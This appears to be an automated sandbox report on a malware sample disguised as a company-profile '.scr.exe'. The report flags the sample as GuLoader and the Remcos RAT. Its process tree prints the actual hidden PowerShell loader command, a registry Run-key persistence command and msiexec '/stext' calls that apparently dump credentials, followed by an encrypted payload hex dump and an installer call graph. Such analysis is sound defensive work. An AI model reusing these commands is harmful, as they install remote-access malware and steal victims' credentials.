                                                                                          Date: Wed, 04 Dec 2024 05:37:11 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 493120
                                                                                          Connection: close
                                                                                          Last-Modified: Tue, 03 Dec 2024 06:12:52 GMT
                                                                                          Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                                                          Set-Cookie: PHPSESSID=a1178d42fd2ece931f7deaa215c98155; expires=Wed, 18-Dec-2024 05:37:11 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Content-Disposition: attachment; filename="AQsUzV160.bin"
                                                                                          Accept-Ranges: bytes
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "674ea164-78640"
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YuqYVXC4hpgObjAe62m%2BAwa6aaYc3KcU9SRxxGRvVWa45viP8xJhhaouOaiDz8stxw5Kih7gmSzmLcH7xZO44zOpGZioJOZK5LCu1d2ITArVuVv7mtc9UYGk3r1AszlzYcom4oW%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8ec9716a7f89c420-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1502&rtt_var=580&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=895&delivery_rate=1944074&cwnd=225&unsent_bytes=0&cid=304cf479a465cfa9&ts=1113&x=0"
                                                                                          2024-12-04 05:37:11 UTC103INData Raw: 66 4a c0 ae bd a0 da 91 41 19 2a f4 bc 10 23 61 0b 3d 75 51 51 70 aa d0 7d ce 0c a5 35 fc bf 2e f3 8f 48 4f aa cb 73 ba 8e ea 84 bb ff 04 85 2b a4 0b 94 c3 61 0f bc 72 18 0c 24 dc 87 8b 7c 02 98 b8 5b 10 fc 21 f2 ae 19 5b b0 85 46 ea 2a 65 41 f4 ba b0 bf 1e 0d c2 b8 08 ba 9c 5f 9a 07 15 c8 01 56 a2 3d e6 40
                                                                                          Data Ascii: fJA*#a=uQQp}5.HOs+ar$|[![F*eA_V=@
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: 95 b6 79 f2 ee 7f 56 8f b3 79 04 09 3b 17 2c 98 11 97 84 2f 0f 73 39 73 2b 25 eb 15 46 87 eb 03 e5 0d d7 b3 d1 97 2c 77 e6 44 94 f1 59 f4 c0 cd 1d 15 2c fe dd 8b 80 60 cd a1 2b b1 78 d4 68 d2 eb e9 15 a6 6b 66 dd e3 da 86 2e 12 36 1a c9 18 01 50 f6 bc da c5 05 e1 58 d2 5f bc b4 95 1b 26 5b 49 90 52 3b 62 e7 b0 26 43 64 4f 99 99 fd be 61 b5 45 b3 61 9c 84 9a 6d be bb 46 fc 61 d5 4b ec a6 56 dc b8 32 dc 9c a1 10 e2 92 47 6a 1e 3f 34 02 29 17 54 31 25 84 28 c3 4b f1 43 f6 06 6c b8 80 12 f1 95 c5 4b 40 be b9 75 50 f5 d1 b9 42 05 20 ca 8a 32 74 b7 ce a8 85 0b 32 1d 59 f3 03 e7 37 ca 4a ee 4b b2 f0 6c 9e 5f b9 f7 02 0b 18 72 9a 15 86 ed 8d 36 e1 8c eb 3f 23 08 82 be c7 1f a4 4d 69 8f 30 32 b8 d8 58 28 3c b5 25 80 b2 9d 1a b3 d4 ee 6b 3a 65 88 41 65 66 e4 e2 f0
                                                                                          Data Ascii: yVy;,/s9s+%F,wDY,`+xhkf.6PX_&[IR;b&CdOaEamFaKV2Gj?4)T1%(KClK@uPB 2t2Y7JKl_r6?#Mi02X(<%k:eAef
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: f3 fe 55 a8 51 5e d8 25 52 83 71 19 b8 ae 62 fa e0 09 8c 9d 04 7f 7c 1b 93 69 51 1b e6 b5 32 dd a8 26 a5 9d 05 a1 2e 7f ae e4 5c 3e 04 f6 af 6e 5c 6f 56 6f e5 65 af 44 ee 9f 31 a7 8c 81 9f b0 ab c0 66 96 40 fd 6f 6d bd e5 6e 1f 49 19 a3 c8 c7 ee 92 65 a6 e7 f6 9e 4d 1b 7d 71 58 7d 85 01 63 43 8c f7 a9 0f 49 a7 74 fb 83 e6 04 6c b6 f1 43 60 7c 32 40 37 e1 4d 1a d4 89 b0 0c cf 25 7e f8 29 44 77 e1 a1 e7 9c 7a db 1f a3 e8 14 ea 2b 61 2c 4a 40 60 27 e5 2c 22 a6 cc 90 04 1b 1e ea 1d c4 17 4f d3 3c 04 7f 13 90 29 fe fa f1 14 71 ea 3c 43 ce b4 b1 f7 e2 f5 c8 3d 64 65 a3 4a 4b e4 96 af cd ff bc a1 a7 09 df f0 53 e1 67 5f b2 6c fb 51 ae b9 b9 cf 36 ab a8 1a b1 f8 76 ea b4 3d c3 61 38 b0 27 8b a0 83 8d 13 81 62 6a 0e fe d5 66 80 29 64 90 eb 85 db 01 2d d7 8f f5 a1
                                                                                          Data Ascii: UQ^%Rqb|iQ2&.\>n\oVoeD1f@omnIeM}qX}cCItlC`|2@7M%~)Dwz+a,J@`',"O<)q<C=deJKSg_lQ6v=a8'bjf)d-
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: 6f 87 9f 1c 4d 8a c2 98 c3 3b 3b a8 da 9a c7 1f 7d 59 dd 2b fa 51 77 c9 ea 01 97 54 f5 74 4b db 5f 47 c7 ee b0 3e 8c 4c 4e 82 4f c5 c2 9d 93 2d 8b 0f 29 6f 1b 65 51 95 42 b2 9e fd 89 ca 86 a2 f9 f4 f5 fa f7 03 6c b9 10 ef 2b 79 d4 b6 88 34 96 3b 6b 62 5f ce 74 a8 cc 68 ef 86 43 1d 05 05 2c 79 eb 66 4d 5a c3 59 47 f5 da c9 9b d6 47 9a 69 fc 07 62 e2 a8 e2 18 3a af af 55 99 e5 ee 3e 74 1e 84 67 d4 c3 69 33 3a 81 5c e7 9c f7 34 9c 28 69 8a 37 44 a9 c6 d2 57 90 4c 81 6d 34 e2 ac 5f 0c 88 32 f0 15 b3 7b da 96 8c a5 5a 5c 3b 08 ab 8b e3 39 ab 04 2a 38 12 4a 93 34 87 3b 11 5b 59 f2 21 81 ce ca 07 6e 90 2c df 1c d4 b7 a6 c2 d2 e0 95 87 e6 b3 a8 d7 5f 6b 6d be 36 36 03 30 17 fc 64 6f 10 50 66 51 f9 28 1f a1 c8 1d 5a 01 3e 79 e4 82 da 6c 84 6c 09 f6 a9 7d 6a 8d 98
                                                                                          Data Ascii: oM;;}Y+QwTtK_G>LNO-)oeQBl+y4;kb_thC,yfMZYGGib:U>tgi3:\4(i7DWLm4_2{Z\;9*8J4;[Y!n,_km660doPfQ(Z>yll}j
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: db 33 9f e7 96 a3 a1 f7 aa 56 2a fe ae 84 79 7a 5a b7 15 45 fd b2 c9 c9 90 cd 68 be eb c1 34 3a 43 75 e6 b2 e0 39 b5 9a 79 76 ec 8f 21 e8 4a c5 53 c7 3d 2c 91 4c 3b 6e 26 4f 2b e8 7f 81 f7 b4 30 d4 16 e0 e5 98 77 fe d3 e4 93 b6 14 82 6b c8 1a 22 eb 1c 80 37 ed 87 e0 5f b9 82 a8 74 55 b1 6e e3 c1 24 5d 4c 13 87 3d 2f e5 d8 24 5f 22 13 cf 86 b6 48 01 d3 c9 b3 16 59 02 e9 89 e5 36 ac 07 b4 2c 86 ba 02 02 a7 f7 f7 e6 9a a6 db 78 b8 71 5b ff 1a 07 f5 77 2e 05 84 bc ad ed f3 ae b0 22 25 25 bc 2b 98 e3 71 50 ae d7 ee be ad 13 bc b7 e1 d9 35 7b ad 16 8f 3a a5 9b 54 ca ca fd 13 00 82 8c 51 60 f9 7a bc b6 b0 97 a5 77 fd 97 46 83 fa fa db d3 6d f3 8c 1c 7c 14 87 46 25 3d 3c 00 b3 7e 22 b6 a5 84 d1 16 fa 62 e4 a7 c4 17 c9 66 b6 b4 a5 07 21 dd 33 30 2b 16 b2 57 25 8b
                                                                                          Data Ascii: 3V*yzZEh4:Cu9yv!JS=,L;n&O+0wk"7_tUn$]L=/$_"HY6,xq[w."%%+qP5{:TQ`zwFm|F%=<~"bf!30+W%
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: c5 ed 7d 5d 2e 76 52 49 e4 90 aa 27 1d 89 dd 0a 9f 53 69 5a be 4f 12 92 cd c0 6f 7e 9a 65 66 69 d6 9c c8 54 5a 45 68 0b c7 c3 5b d9 1f 66 d4 c4 67 c5 13 01 bd f3 64 91 2f a9 19 48 18 82 05 4a 98 92 a2 20 ad ab 58 a0 e4 00 a1 0e 3b cd 1d e8 a8 eb 9f b6 f7 ba 91 ca 98 b7 9f f2 98 01 34 d5 8d 73 52 a0 c6 7c 25 ad 96 b4 da 10 24 2d 29 e6 f2 12 e9 68 72 81 3b 58 e4 1d 08 46 9d f7 09 d4 dd a9 c6 84 14 b2 6e f7 44 fb 38 1f a5 58 ea ef 6c 33 7a 98 27 b6 18 d2 25 68 2a 6e e5 4c 8d b7 42 f9 32 02 a6 35 3e 1c 52 6e f8 8e 6c 2c b7 96 5a 70 c0 91 93 97 1e 48 39 7c 15 c6 ef c9 36 dc 0b 79 60 03 24 a9 1e 97 af 24 2e 46 8c 29 2d e0 59 81 2b d4 50 ef 85 22 74 34 e4 5c fe c0 fd 5f d2 c0 fb 64 b2 2b b4 03 d6 4e 92 da 45 15 45 76 63 87 20 73 9e d7 8d 65 36 e2 fe c7 59 33 1c
                                                                                          Data Ascii: }].vRI'SiZOo~efiTZEh[fgd/HJ X;4sR|%$-)hr;XFnD8Xl3z'%h*nLB25>Rnl,ZpH9|6y`$$.F)-Y+P"t4\_d+NEEvc se6Y3
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: ef 74 4c 83 e3 84 d7 64 94 dd 9f ca bc 9b 6d f4 84 87 27 33 6f 39 19 bc 30 5d 1c bc c6 e6 db 48 bd 95 4e f2 0a c9 94 18 24 54 1f 55 72 56 16 38 fc 25 cd b9 e9 a3 c5 a7 17 c2 ec 93 58 6e 20 37 8c a4 2c ca 77 b3 51 0c 42 56 17 f1 8e 36 c4 33 9e 4c 5b 17 9e 69 9b 7c 18 c0 ed 33 c0 aa 88 99 f7 18 19 18 62 7f 7d aa 28 1e 07 3f 70 ae e9 13 6b 8d 9f 01 89 71 28 7a 77 4d e4 0f b0 0c 77 ee 5a df b3 44 ad f2 f7 55 b8 61 1d 16 fe b2 84 08 ac 1f bb 9a a6 e3 62 4a ef 3c 05 c2 a9 9d ec 12 e1 a3 f3 4f cb 6f d7 67 a9 f2 95 aa 43 e3 3e 14 58 68 78 29 f6 f5 7f 30 5e 55 82 ae 47 c1 a1 92 81 93 6c 09 49 e3 eb 32 2c 87 ff e1 30 30 22 a6 fa 42 70 d3 bd 37 46 d3 6b 2a d7 14 d2 2c 07 92 cd 45 b9 e8 98 eb 58 1c 0e 90 19 89 0e 1c d7 8a 7a 28 dc 74 13 26 63 b8 82 57 85 28 76 5e a1
                                                                                          Data Ascii: tLdm'3o90]HN$TUrV8%Xn 7,wQBV63L[i|3b}(?pkq(zwMwZDUabJ<OogC>Xhx)0^UGlI2,00"Bp7Fk*,EXz(t&cW(v^
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: 4b b3 18 6d 12 cf 5a 0b d9 6c 98 6b b6 0a dd 0f 95 84 a5 26 d7 cd d2 10 83 33 63 64 de 15 e9 ba d0 63 5f 3a c5 04 03 52 3e e1 88 aa 02 4a 32 d7 ed e7 30 50 0a cc 51 ae 58 08 36 28 d5 1d 58 76 1c 8e 75 91 bb 8d 3b 51 9f fb 21 5b 96 09 d6 08 c3 b1 73 d9 4d fa 82 5d 0b 05 a5 13 74 81 e1 24 04 c1 3a e7 a3 72 9a 15 be 15 0d e4 02 d0 d1 98 1e b1 67 23 59 2b 1c 72 49 e9 99 d2 df f6 d2 df 88 72 c8 b8 3e 7e aa aa f2 50 25 d1 e0 3a 87 35 9e 9a 24 a8 2e 9c d7 30 6e 83 06 3e f0 31 d7 3d 56 b9 95 01 85 b4 72 de 64 7f 4e c5 01 bf bc eb db 52 1e 53 13 8d e1 22 db 4d 77 f3 6f 65 e1 74 25 a1 78 df 38 d9 04 46 dd 29 98 90 62 54 50 8a 1e 26 30 79 0d a0 08 3c 85 40 e7 37 0f 47 bf f1 ee ea 59 e0 99 ea 6d c8 9b a0 93 8c ad ab 66 4d 19 0f 9b 50 d1 51 bd 50 ef 33 16 b5 e1 a6 b3
                                                                                          Data Ascii: KmZlk&3cdc_:R>J20PQX6(Xvu;Q![sM]t$:rg#Y+rIr>~P%:5$.0n>1=VrdNRS"Mwoet%x8F)bTP&0y<@7GYmfMPQP3
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: e1 05 d3 c4 f2 ac c5 07 2f 3b 82 6e a3 a2 60 e5 9a 8e cc 90 ea 21 af 84 d7 13 4e 80 d6 92 0d 00 d5 f4 59 cf f6 55 37 1a 17 48 44 a8 1f f7 6d 61 af bc 38 80 58 79 25 8a 0d 12 b8 77 58 cb 85 18 8b fe d7 65 84 bf 35 33 48 5c ca 19 59 16 f9 3c 0e 02 bc b1 eb dc 41 a8 15 13 95 56 8d 70 51 d4 41 cd 9e 76 b1 0d 1f e4 a6 cd b3 7b 0f 0d 12 7f 04 5d e3 00 09 c5 81 ac 75 43 4d 02 f8 fc 41 b7 29 2e e2 29 a6 00 4b f2 96 95 3c 85 8c 29 47 85 62 6f 7e f7 3e 21 29 ec 0e 13 b5 9a a6 8e 28 8e 5e a9 cf 03 9d 81 89 8e 27 af 26 62 3a c6 f6 2c 57 52 88 bb 39 42 33 fa 62 fd 9e c1 58 40 f2 ea 13 ef e4 93 02 b4 63 3c 78 bb c5 7c 19 5c 6c 5d 93 44 6f 5e d7 c2 ad 8c bf db 6e d4 7d bd 0c d2 81 9c 5e a3 48 16 fe 70 32 a7 8c ab b8 e9 1e 55 e6 f4 c1 ce 21 0c 59 43 dc 84 1e 9a d7 9f b2
                                                                                          Data Ascii: /;n`!NYU7HDma8Xy%wXe53H\Y<AVpQAv{]uCMA).)K<)Gbo~>!)(^'&b:,WR9B3bX@c<x|\l]Do^n}^Hp2U!YC
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: 51 4d 8f 4c ff 12 b6 bc 92 05 4e 40 16 42 aa 69 d5 69 26 09 4b 32 ce cd 14 93 94 bc fb a0 df a9 66 33 8a 73 ab 34 72 37 83 6c c1 11 5e b1 00 fb b6 50 1c 7d ca e3 3f 1c ab b7 70 83 b0 c1 fc 27 b1 93 2a 7c 7f c6 b9 36 4c a0 ca a7 c5 13 ad 56 16 40 7f d1 c6 ef f4 39 a6 40 42 47 d8 79 05 a1 ae a4 3c 7d d1 75 5d 4b 56 d0 63 a4 2c 4e e4 23 3b 12 e3 14 59 57 91 46 00 09 b3 5d 3f 7c a5 56 f8 8a 98 af eb 3f d7 9d c0 33 2b 1e db f9 cd 2e 55 67 14 0f e3 3d 76 2e f5 ba d6 c2 87 a6 3a 46 90 45 29 7f 3d ae 79 01 9c 1d 31 66 04 f0 ad d1 88 29 84 fc a0 60 5e 9d 0a 61 59 16 15 21 c7 68 6c 60 e2 0a b4 93 40 e0 bc ff a3 7f 79 8f e8 e4 58 4a f7 32 49 e5 2a e0 ab b8 e3 17 cd 32 94 d4 a8 4f b7 68 98 eb 6a 90 18 1a d5 c3 82 45 4d f1 3c be db e3 04 4c 53 fa 06 e1 7f 3c b2 11 5d
                                                                                          Data Ascii: QMLN@Bii&K2f3s4r7l^P}?p'*|6LV@9@BGy<}u]KVc,N#;YWF]?|V?3+.Ug=v.:FE)=y1f)`^aY!hl`@yXJ2I*2OhjEM<LS<]


                                                                                          Target ID:0
                                                                                          Start time:00:36:00
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:798'379 bytes
                                                                                          MD5 hash:935BDB714D2C6A118E9C6BFD941084B8
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:00:36:01
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)"
                                                                                          Imagebase:0xa60000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2617447888.000000000A528000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:00:36:01
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:00:36:56
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                          Imagebase:0xe10000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:7
                                                                                          Start time:00:37:05
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
                                                                                          Imagebase:0x790000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:00:37:05
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:00:37:05
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
                                                                                          Imagebase:0x620000
                                                                                          File size:59'392 bytes
                                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:10
                                                                                          Start time:00:37:22
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kyeljthgepgkbumddfxbvgcpb"
                                                                                          Imagebase:0xe10000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:00:37:22
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\nsjeklaasxzpdjihuqsuylwgkeqq"
                                                                                          Imagebase:0xe10000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:00:37:22
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xmowlwlbgfrcopwtdaewjyjptlizvdg"
                                                                                          Imagebase:0xe10000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true


                                                                                            Execution Graph

                                                                                            Execution Coverage:19%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:17.2%
                                                                                            Total number of Nodes:1372
                                                                                            Total number of Limit Nodes:32
4540 405c2d 71 API calls 4539->4540 4541 401956 4540->4541 4542 404991 4543 4049bd 4542->4543 4544 4049ce 4542->4544 4603 405b65 GetDlgItemTextW 4543->4603 4545 4049da GetDlgItem 4544->4545 4553 404a39 4544->4553 4547 4049ee 4545->4547 4551 404a02 SetWindowTextW 4547->4551 4556 405e9b 4 API calls 4547->4556 4548 404b1d 4552 404ccc 4548->4552 4605 405b65 GetDlgItemTextW 4548->4605 4549 4049c8 4550 4067cf 5 API calls 4549->4550 4550->4544 4557 4044a0 22 API calls 4551->4557 4555 404507 8 API calls 4552->4555 4553->4548 4553->4552 4558 40655e 21 API calls 4553->4558 4560 404ce0 4555->4560 4561 4049f8 4556->4561 4562 404a1e 4557->4562 4563 404aad SHBrowseForFolderW 4558->4563 4559 404b4d 4564 405ef8 18 API calls 4559->4564 4561->4551 4568 405df0 3 API calls 4561->4568 4565 4044a0 22 API calls 4562->4565 4563->4548 4566 404ac5 CoTaskMemFree 4563->4566 4567 404b53 4564->4567 4569 404a2c 4565->4569 4570 405df0 3 API calls 4566->4570 4606 406521 lstrcpynW 4567->4606 4568->4551 4604 4044d5 SendMessageW 4569->4604 4572 404ad2 4570->4572 4576 404b09 SetDlgItemTextW 4572->4576 4579 40655e 21 API calls 4572->4579 4574 404b6a 4578 406915 5 API calls 4574->4578 4575 404a32 4577 406915 5 API calls 4575->4577 4576->4548 4577->4553 4585 404b71 4578->4585 4580 404af1 lstrcmpiW 4579->4580 4580->4576 4582 404b02 lstrcatW 4580->4582 4581 404bb2 4607 406521 lstrcpynW 4581->4607 4582->4576 4584 404bb9 4586 405e9b 4 API calls 4584->4586 4585->4581 4590 405e3c 2 API calls 4585->4590 4591 404c0a 4585->4591 4587 404bbf GetDiskFreeSpaceW 4586->4587 4589 404be3 MulDiv 4587->4589 4587->4591 4589->4591 4590->4585 4592 404c7b 4591->4592 4594 404e16 24 API calls 4591->4594 4593 404c9e 4592->4593 4596 40140b 2 API calls 4592->4596 4608 4044c2 KiUserCallbackDispatcher 4593->4608 4595 404c68 4594->4595 4597 404c7d SetDlgItemTextW 4595->4597 4598 404c6d 4595->4598 4596->4593 4597->4592 4600 404d4d 24 API calls 4598->4600 4600->4592 4601 404cba 4601->4552 4602 4048ea SendMessageW 4601->4602 4602->4552 
4603->4549 4604->4575 4605->4559 4606->4574 4607->4584 4608->4601 4609 401491 4610 4055a6 28 API calls 4609->4610 4611 401498 4610->4611 4612 401914 4613 402dab 21 API calls 4612->4613 4614 40191b 4613->4614 4615 405b81 MessageBoxIndirectW 4614->4615 4616 401924 4615->4616 4617 402896 4618 40289d 4617->4618 4620 402bae 4617->4620 4619 402d89 21 API calls 4618->4619 4621 4028a4 4619->4621 4622 4028b3 SetFilePointer 4621->4622 4622->4620 4623 4028c3 4622->4623 4625 406468 wsprintfW 4623->4625 4625->4620 4626 401f17 4627 402dab 21 API calls 4626->4627 4628 401f1d 4627->4628 4629 402dab 21 API calls 4628->4629 4630 401f26 4629->4630 4631 402dab 21 API calls 4630->4631 4632 401f2f 4631->4632 4633 402dab 21 API calls 4632->4633 4634 401f38 4633->4634 4635 401423 28 API calls 4634->4635 4636 401f3f 4635->4636 4643 405b47 ShellExecuteExW 4636->4643 4638 401f87 4639 402933 4638->4639 4640 4069c0 5 API calls 4638->4640 4641 401fa4 CloseHandle 4640->4641 4641->4639 4643->4638 4644 402f98 4645 402faa SetTimer 4644->4645 4647 402fc3 4644->4647 4645->4647 4646 403018 4647->4646 4648 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4647->4648 4648->4646 4649 40551a 4650 40552a 4649->4650 4651 40553e 4649->4651 4652 405530 4650->4652 4653 405587 4650->4653 4654 405546 IsWindowVisible 4651->4654 4660 40555d 4651->4660 4656 4044ec SendMessageW 4652->4656 4655 40558c CallWindowProcW 4653->4655 4654->4653 4657 405553 4654->4657 4658 40553a 4655->4658 4656->4658 4659 404e5b 5 API calls 4657->4659 4659->4660 4660->4655 4661 404edb 4 API calls 4660->4661 4661->4653 4662 401d1c 4663 402d89 21 API calls 4662->4663 4664 401d22 IsWindow 4663->4664 4665 401a25 4664->4665 4666 40149e 4667 4014ac PostQuitMessage 4666->4667 4668 4023a2 4666->4668 4667->4668 3207 401ba0 3208 401bf1 3207->3208 3209 401bad 3207->3209 3211 401bf6 3208->3211 3212 401c1b GlobalAlloc 3208->3212 3210 401c36 3209->3210 3215 401bc4 3209->3215 3213 40655e 21 API calls 3210->3213 3221 4023a2 3210->3221 3211->3221 3245 
406521 lstrcpynW 3211->3245 3226 40655e 3212->3226 3216 40239c 3213->3216 3243 406521 lstrcpynW 3215->3243 3246 405b81 3216->3246 3219 401c08 GlobalFree 3219->3221 3220 401bd3 3244 406521 lstrcpynW 3220->3244 3224 401be2 3250 406521 lstrcpynW 3224->3250 3241 406569 3226->3241 3227 4067b0 3228 4067c9 3227->3228 3273 406521 lstrcpynW 3227->3273 3228->3210 3230 406781 lstrlenW 3230->3241 3234 40667a GetSystemDirectoryW 3234->3241 3235 40655e 15 API calls 3235->3230 3236 406690 GetWindowsDirectoryW 3236->3241 3237 40655e 15 API calls 3237->3241 3238 406722 lstrcatW 3238->3241 3241->3227 3241->3230 3241->3234 3241->3235 3241->3236 3241->3237 3241->3238 3242 4066f2 SHGetPathFromIDListW CoTaskMemFree 3241->3242 3251 4063ef 3241->3251 3256 406915 GetModuleHandleA 3241->3256 3262 4067cf 3241->3262 3271 406468 wsprintfW 3241->3271 3272 406521 lstrcpynW 3241->3272 3242->3241 3243->3220 3244->3224 3245->3219 3247 405b96 3246->3247 3248 405be2 3247->3248 3249 405baa MessageBoxIndirectW 3247->3249 3248->3221 3249->3248 3250->3221 3274 40638e 3251->3274 3254 406423 RegQueryValueExW RegCloseKey 3255 406453 3254->3255 3255->3241 3257 406931 3256->3257 3258 40693b GetProcAddress 3256->3258 3278 4068a5 GetSystemDirectoryW 3257->3278 3260 40694a 3258->3260 3260->3241 3261 406937 3261->3258 3261->3260 3269 4067dc 3262->3269 3263 